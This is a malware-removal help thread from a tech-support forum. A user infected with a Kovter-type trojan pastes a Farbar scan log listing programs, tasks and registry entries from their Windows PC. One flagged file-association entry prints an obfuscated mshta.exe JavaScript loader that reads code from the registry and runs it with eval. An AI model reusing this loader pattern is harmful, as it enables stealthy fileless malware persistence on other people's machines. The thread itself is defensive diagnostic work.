Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

trojan.kotver!gm2

Started by [email protected] , Aug 30 2016 08:57 AM

Virus Spyware Malware

This topic is locked

#1
[email protected]

Posted 30 August 2016 - 08:57 AM

Member

Member
18 posts

I'm infected with the trojan.kotver!gm2 which my norton will not fix. files from run of Farbar attachec

#2
zep516

Posted 30 August 2016 - 10:06 AM

Trusted Helper

Malware Removal
8,093 posts

Hi! My name is zep516 and Welcome to Geekstogo!
I'll do the best I can to resolve your computer issue
Please make sure to carefully read any instruction that I give you. If you're not sure, or if something unexpected happens, don't continue Stop and ask! Never be afraid to ask questions!

Please try an paste the 2 logs files Frst.txt And additions.txt to your next reply. Do not see logs above.

Thanks
Joe

#3
[email protected]

Posted 30 August 2016 - 11:09 AM

Member

Topic Starter
Member
18 posts

One of Two

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-08-2016
Ran by JHS-JJS (30-08-2016 10:44:59)
Running from C:\Users\JHS-JJS\Desktop
Windows Vista ™ Home Premium Service Pack 2 (X64) (2008-09-22 09:59:53)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-1231050607-2223395895-1768608861-500 - Administrator - Disabled)
Guest (S-1-5-21-1231050607-2223395895-1768608861-501 - Limited - Enabled)
JHS-JJS (S-1-5-21-1231050607-2223395895-1768608861-1000 - Administrator - Enabled) => C:\Users\JHS-JJS

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Security Suite (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security Suite (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security Suite (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

AAC Decoder (HKLM-x32\...\{AEF9DC35ADDF4825B049ACBFD1C6EB37}) (Version: 7.1.0 - DivX, Inc.)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9130 - Adobe Systems Inc.)
Adobe Shockwave Player (HKLM-x32\...\Adobe Shockwave Player) (Version: 11 - Adobe Systems, Inc.)
AIM 7 (HKLM-x32\...\AIM_7) (Version: - )
Akamai NetSession Interface (HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Akamai) (Version: - Akamai Technologies, Inc)
AOL Instant Messenger (HKLM-x32\...\AOL Instant Messenger) (Version: - )
AOL Mail and AIM Gadget (HKLM-x32\...\{F226C1DA-66D7-4ABC-86B5-3F978A660EBF}) (Version: 1.0.0 - AOL LLC)
AOL Toolbar (HKLM-x32\...\AOL Toolbar) (Version: - AOL Inc.)
AOL Uninstaller (Choose which Products to Remove) (HKLM-x32\...\AOL Uninstaller) (Version: - AOL Inc.)
Apple Application Support (HKLM-x32\...\{F5266D28-E0B2-4130-BFC5-EE155AD514DC}) (Version: 2.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Audacity 2.0.2 (HKLM-x32\...\Audacity_is1) (Version: 2.0.2 - Audacity Team)
AutoUpdate (HKLM-x32\...\{18D10072035C4515918F7E37EAFAACFC}) (Version: 1.1 - )
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Canon IJ Network Scan Utility (HKLM-x32\...\Canon_IJ_Network_Scan_UTILITY) (Version: - )
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: - )
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: - )
Canon MP Navigator EX 1.1 (HKLM-x32\...\MP Navigator EX 1.1) (Version: - )
Canon MP Navigator EX 3.1 (HKLM-x32\...\MP Navigator EX 3.1) (Version: - )
Canon MX850 series (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX850_series) (Version: - )
Canon MX850 series User Registration (HKLM-x32\...\Canon MX850 series User Registration) (Version: - )
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version: - )
Canon MX870 series User Registration (HKLM-x32\...\Canon MX870 series User Registration) (Version: - )
Canon Utilities Easy-PhotoPrint EX (HKLM-x32\...\Easy-PhotoPrint EX) (Version: - )
Canon Utilities My Printer (HKLM-x32\...\CanonMyPrinter) (Version: - )
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version: - )
CDDRV_Installer (Version: 4.60 - Logitech) Hidden
Cisco Connect (HKLM-x32\...\Cisco Connect) (Version: 1.3.11006.1 - Cisco Consumer Products LLC)
Comcast Access (HKLM-x32\...\com.comcast.access.13A1FA90F0FC9DC009FB0956ADD0F13F8608561B.1) (Version: ComcastAccess-1.59 - Comcast Cable Communications Management LLC)
Comcast Access (x32 Version: 1.59 - Comcast Cable Communications Management LLC) Hidden
Conexant D850 PCI V.92 Modem (HKLM\...\CNXT_MODEM_PCI_HSF) (Version: 7.74.00 - Conexant)
Dell Getting Started Guide (HKLM-x32\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Video Chat (remove only) (HKLM-x32\...\Dell Video Chat) (Version: 6.0 (6534) - SightSpeed Inc.)
Dell-eBay (HKLM-x32\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)
Digital Line Detect (HKLM-x32\...\{E646DCF0-5A68-11D5-B229-002078017FBF}) (Version: 1.21 - BVRP Software, Inc)
DivX Codec (HKLM-x32\...\{7B63B2922B174135AFC0E1377DD81EC2}) (Version: 6.8.5 - DivX, Inc.)
DivX Converter (HKLM-x32\...\{13F3917B56CD4C25848BDC69916971BB}) (Version: 7.0.0 - DivX, Inc.)
DivX Converter (HKLM-x32\...\{B13A7C41581B411290FBC0395694E2A9}) (Version: 7.0.0 - DivX, Inc.)
DivX Player (HKLM-x32\...\{8ADFC4160D694100B5B8A22DE9DCABD9}) (Version: 7.0.0 - DivX, Inc.)
DivX Plus DirectShow Filters (HKLM-x32\...\DivX Plus DirectShow Filters) (Version: - DivX, Inc.)
DivX Version Checker (HKLM-x32\...\{3FC7CBBC4C1E11DCA1A752EA55D89593}) (Version: 7.0.0.19 - DivX, Inc.)
DivX Web Player (HKLM-x32\...\{B7050CBDB2504B34BC2A9CA0A692CC29}) (Version: 1.4.2 - DivX,Inc.)
Download Updater (AOL Inc.) (HKLM-x32\...\SoftwareUpdUtility) (Version: - AOL Inc.) <==== ATTENTION
EDocs (HKLM-x32\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version: - )
erLT (x32 Version: 1.20.0137 - Logitech, Inc.) Hidden
Feedback Tool (HKLM-x32\...\{90024193-9F13-4877-89D5-A1CDF0CBBF28}) (Version: 1.1.0 - Microsoft Corporation)
Female Voice Pack (HKLM-x32\...\{71F8C486-8A13-468E-8B73-06051075556A}) (Version: 3.3.1 - Screaming Bee)
File Opener Pro (HKLM-x32\...\fileopenerpro) (Version: - FileOpenerPro) <==== ATTENTION
Garmin City Navigator North America NT 2010.20 (HKLM-x32\...\{C2E8B236-7554-45FE-92C0-94EF76E4D182}) (Version: 13.20.0.0 - Garmin Ltd or its subsidiaries)
Garmin Communicator Plugin (HKLM-x32\...\{A7DEBAA4-B211-4D1A-A6B3-E52BFAAA1D0C}) (Version: 2.7.3 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
Garmin WebUpdater (HKLM-x32\...\{00FE2935-FB56-4410-AB5F-D6E70C1771D2}) (Version: 2.5.6 - Garmin Ltd or its subsidiaries)
GIMP 2.6.11 (HKLM-x32\...\WinGimp-2.0_is1) (Version: 2.6.11 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Talk (remove only) (HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version: - )
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
H.264 Decoder (HKLM-x32\...\{A96E97134CA649888820BCDE5E300BBD}) (Version: 1.0.0 - DivX, Inc.)
InstallIQ Updater (HKLM-x32\...\{8E1CB0F1-67BF-4052-AA23-FA22E94804C1}) (Version: 1.4.3.0 - W3i, LLC)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version: - Intel Corporation)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Junk Mail filter update (x32 Version: 14.0.8117.416 - Microsoft Corporation) Hidden
KhalInstallWrapper (Version: 2.00.0000 - Logitech) Hidden
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Logitech SetPoint (HKLM-x32\...\{F29B21BD-CAA6-445F-8EF7-A7E2B9D8B14E}) (Version: 4.80 - Logitech)
Meter Drivers for OneTouch® Software (x32 Version: 1.7.0 - LifeScan) Hidden
Meter Drivers for OneTouch® Software v1.7.0 (HKLM-x32\...\InstallShield_{B18C4F32-5CDD-4357-8523-85659CFCF2A0}) (Version: 1.7.0 - LifeScan)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Live Add-in 1.3 (HKLM-x32\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office XP Professional (HKLM-x32\...\{90110409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.6626.0 - Microsoft Corporation)
Microsoft Picture It! Express 7.0 (HKLM-x32\...\{369B36BE-3D64-4641-9AEA-808D436FE130}) (Version: 7.0.0.0000 - Microsoft Corporation)
Microsoft Report Viewer Redistributable 2008 (KB971118) (HKLM-x32\...\Microsoft Report Viewer Redistributable 2008 (KB971118)) (Version: - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version: - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{B636C9B9-A3F2-4DCE-ADCC-72E095018385}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MKV Splitter (HKLM-x32\...\{AAC389499AEF40428987B3D30CFC76C9}) (Version: 1.0.0 - DivX, Inc.)
Modem Diagnostic Tool (HKLM\...\{1C89932F-1D9D-4776-AD7A-9156FF792539}) (Version: 1.0.17.8 - Dell)
MorphVOX Pro (HKLM-x32\...\{D1E01FCE-5C90-402B-BB4E-B73EC6F85328}) (Version: 4.3.8 - Screaming Bee)
Move Media Player (HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Move Media Player) (Version: - Move Networks)
Mozilla Firefox 43.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.1 (x86 en-US)) (Version: 43.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.1 - Mozilla)
MSXML 4.0 SP2 (KB936181) (HKLM-x32\...\{C04E32E0-0416-434D-AFB9-6969D703A9EF}) (Version: 4.20.9848.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB941833) (HKLM-x32\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Msxml4 for LDCF (HKLM-x32\...\{D6160F37-7638-4E56-9774-F3C88F30A4A9}) (Version: 1.0.0.0 - )
NetWaiting (HKLM-x32\...\{3F92ABBB-6BBF-11D5-B229-002078017FBF}) (Version: 2.5.53 - BVRP Software, Inc)
Norton Security Suite (HKLM-x32\...\N360) (Version: 22.7.1.32 - Symantec Corporation)
ODF Add-in for Microsoft Office (HKLM-x32\...\{2BC21CD2-8053-406A-80F6-9AB61717B49D}) (Version: 4.0.5309.0 - OpenXML/ODF Translator Team)
OneTouch Software (HKLM-x32\...\{F2A056D9-54B2-4F2B-8DD8-A42A73D1E5E7}) (Version: - )
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.0 - Frank Heindörfer, Philip Chinery)
Personality Voices (HKLM-x32\...\{29C042AB-059B-414C-840E-94775E3F24A8}) (Version: 1.0.0 - Screaming Bee)
PL-2303 USB-to-Serial (HKLM-x32\...\{ECC3713C-08A4-40E3-95F1-7D0704F1CE5E}) (Version: 1.00.000 - Prolific Technology INC)
PL-2303 Vista Driver Installer (HKLM-x32\...\{EEC010D0-1252-4E1D-BAD9-F1B8F414535C}) (Version: 3.0.1.0 - Prolific)
PowerDVD (HKLM-x32\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.1 - Dell)
Presto! PageManager 7.15.20 (HKLM-x32\...\{D2D6B9EB-C6DC-4DAA-B4DE-BB7D9735E7DA}) (Version: 7.15.20 - NewSoft Technology Corporation)
Prodigy Diabetes Management Software Version 2.4 win7 (HKLM-x32\...\{A9FA2103-D1C8-4D80-A2AE-BE5B5388CE43}) (Version: 2.4 - Prodigy Diabetes Care LLC)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM-x32\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: - Realtek Semiconductor Corp.)
Roxio Creator DE (HKLM-x32\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)
RTC Client API v1.2 (HKLM-x32\...\{44CDBD1B-89FB-4E02-8319-2A4C550F664A}) (Version: 1.2.0000 - Microsoft)
ScanSoft OmniPage SE 4 (HKLM-x32\...\{FE893E2C-11B4-47CB-88F6-6647D90C6A13}) (Version: 15.2.0020 - Nuance Communications, Inc.)
Spelling Dictionaries Support For Adobe Reader 9 (HKLM-x32\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
Symantec Technical Support Web Controls (HKLM-x32\...\{20C53FA2-4307-4671-A93F-9463B29DFCF1}) (Version: 3.5.3 - Symantec Corporation)
Uninstall AOL Emergency Connect Utility 1.0 (HKLM-x32\...\AOL Emergency Connect Utility 1.0) (Version: - )
Unity Web Player (HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\UnityWebPlayer) (Version: - Unity Technologies ApS)
USB Video Driver (HKLM-x32\...\{2758691A-2CDE-4942-A4AC-0E8F61FE2067}) (Version: 1.00 - EETI)
Windows Driver Package - eMPIA Technology Inc, (emAudio) MEDIA (08/31/2007 5.7.0831.0) (HKLM\...\1B8C0FE57993F0D33DD0A689D44B5B3D8954B0F7) (Version: 08/31/2007 5.7.0831.0 - eMPIA Technology Inc,)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Xilisoft PowerPoint to Video Converter Free (HKLM-x32\...\Xilisoft PowerPoint to Video Converter Free) (Version: 1.1.1.20120601 - Xilisoft)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{d33f3ced-d7d5-44f1-a9fe-6927dabb1934}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {199C1A68-D14F-42C8-92ED-08231530F0D0} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\WSCStub.exe [2016-08-16] (Symantec Corporation)
Task: {1BB1662A-F883-4999-B10B-34B680B2032B} - System32\Tasks\Norton 360\Norton Error Analyzer => C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\SymErr.exe [2016-05-23] (Symantec Corporation)
Task: {2925079F-98DD-4453-AA11-DA5E745A6C64} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security Suite\Upgrade.exe [2016-08-16] (Symantec Corporation)
Task: {2D65E116-BC2D-40F7-8DEC-F995E0A2F480} - System32\Tasks\{AEB3560F-FEA4-4B1B-A229-C629B89FB2EF} => pcalua.exe -a C:\Users\JHS-JJS\Desktop\epson12578.exe -d C:\epson\epson11889_easyprint_310a
Task: {54D1D4F4-5D3C-4CAB-BC82-EF018B19B497} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {6A11ED75-4E12-4A9A-B419-BB346B8351CF} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files (x86)\Realtek\RTNICDiag\RTNICDiag.exe [2008-07-21] (Realtek)
Task: {B1A8D429-0D8C-4CD8-A6CD-A3E83B1EE0CB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {C0044E95-1977-45B0-9B7B-69DCF08A7E50} - System32\Tasks\{6D7B84B1-EB05-439D-B85E-D3E8034E6F8A} => pcalua.exe -a "C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RYOC2QJR\epson12578[1].exe" -d C:\epson\epson11889_easyprint_310a
Task: {C3D8CD03-979C-4EF9-81EE-5E3421856239} - System32\Tasks\{7FA9A828-22F3-460F-A1B2-95415F2B2CED} => pcalua.exe -a "C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z3Z64ST2\uninstall_flash_player[1].exe" -d C:\Users\JHS-JJS\Desktop
Task: {DAFB9A93-E033-4139-9F96-32DDA0777E80} - System32\Tasks\PDVDDXSrv.exe_1027380385 => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [2008-05-23] (CyberLink Corp.)
Task: {E35F71AF-20F9-42F8-8344-5ABC853C19C8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {E9D084FD-53F3-4C0F-9521-918E42973369} - System32\Tasks\Norton 360\Norton Error Processor => C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\SymErr.exe [2016-05-23] (Symantec Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files (x86)\Realtek\RTNICDiag\RTNICDiag.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\JHS-JJS\AppData\Local\b263cb\84e7ae.lnk -> C:\Users\JHS-JJS\AppData\Local\b263cb\d9bd8b.bat ()
Shortcut: C:\Users\JHS-JJS\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.com

==================== Loaded Modules (Whitelisted) ==============

2012-11-29 18:40 - 2005-03-12 01:07 - 00087040 _____ () C:\Windows\System32\pdfcmnnt.dll
2010-09-28 21:13 - 2011-04-20 01:21 - 00045056 _____ () C:\Windows\system32\atitmp64.dll
2008-11-06 17:05 - 2006-09-20 09:35 - 00020480 _____ () C:\Windows\System32\spool\drivers\x64\3\WrtMon.exe
2010-08-20 10:16 - 2009-07-20 12:35 - 00018960 _____ () C:\Program Files\Logitech\SetPoint\khalwrapper.dll
2008-11-06 17:05 - 2006-10-30 17:59 - 00024576 _____ () C:\Windows\System32\spool\drivers\x64\3\WrtProc.exe
2010-08-20 10:16 - 2009-07-20 04:00 - 00077824 _____ () C:\Program Files\Logitech\SetPoint\x86\SetPoint32.exe

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcmscsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <===== ATTENTION
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Classes\46bb36: "C:\Windows\system32\mshta.exe" "javascript:JuJWx1="H";J1I8=new ActiveXObject("WScript.Shell");O9xZdAbO="msF";D8dwB=J1I8.RegRead("HKCU\\software\\tipm\\igbespedi");Nzqpd2a="y2v1QG";eval(D8dwB);PFf8KK2H="ovZ";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 08:34 - 2006-09-18 17:37 - 00000736 ____N C:\Windows\system32\Drivers\etc\hosts

::1             localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\JHS-JJS\Pictures\814Bafter.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1)
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: gusvc => 3

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
